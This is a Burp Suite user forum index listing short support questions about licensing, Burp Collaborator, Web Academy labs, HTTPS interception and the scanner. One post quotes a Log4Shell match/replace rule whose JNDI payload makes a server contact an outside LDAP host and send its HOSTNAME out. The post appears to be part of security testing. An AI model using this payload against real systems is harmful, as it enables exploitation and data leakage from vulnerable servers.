Burp Suite User Forum

Create new post

my license has been used many times now is not working

Hello Support team happy new year i need to disable the old license and generate a new one in order to disable the old devices over the cloud thanks

Last updated: Dec 29, 2021 09:42AM UTC | 1 Agent replies | 0 Community replies | How do I?

burp collab client - Wont work properly

Hi there, I need help enabling burp collab client to work correctly. I do the health check and am not sure how to fix the problems that arise and i dont see full solutions online.

Last updated: Dec 29, 2021 08:27AM UTC | 1 Agent replies | 0 Community replies | How do I?

Bad Request in Web Academy labs..!!!!

Hi all, I'm totally new to web security want to learn web security and I've found out portswigger web labs. this is my first day starting to learn about websec. but, when I tried to access my first lab as suggested by...

Last updated: Dec 24, 2021 10:24AM UTC | 7 Agent replies | 9 Community replies | How do I?

How do I know if https requests are failing to be decrypted?

I am attempting to mitm an android emulator on my computer with burpsuite. I am able to see https traffic of insecure things like assets, but I see no traffic for data being posted to and from the app, over https. I know the...

Last updated: Dec 24, 2021 08:53AM UTC | 2 Agent replies | 3 Community replies | How do I?

Scanner does not honor match/replace rules

I have added a log4j match/replace rule on the User-Agent like this Match: ^User-Agent.*$ Replace: User-Agent: \${jndi:ldap://log4shell.huntress.com:1389/hostname=\${env:HOSTNAME}/guid} The rule works just fine when...

Last updated: Dec 23, 2021 08:09PM UTC | 1 Agent replies | 1 Community replies | How do I?

LAB: Exploiting HTTP request smuggling to perform web cache poisoning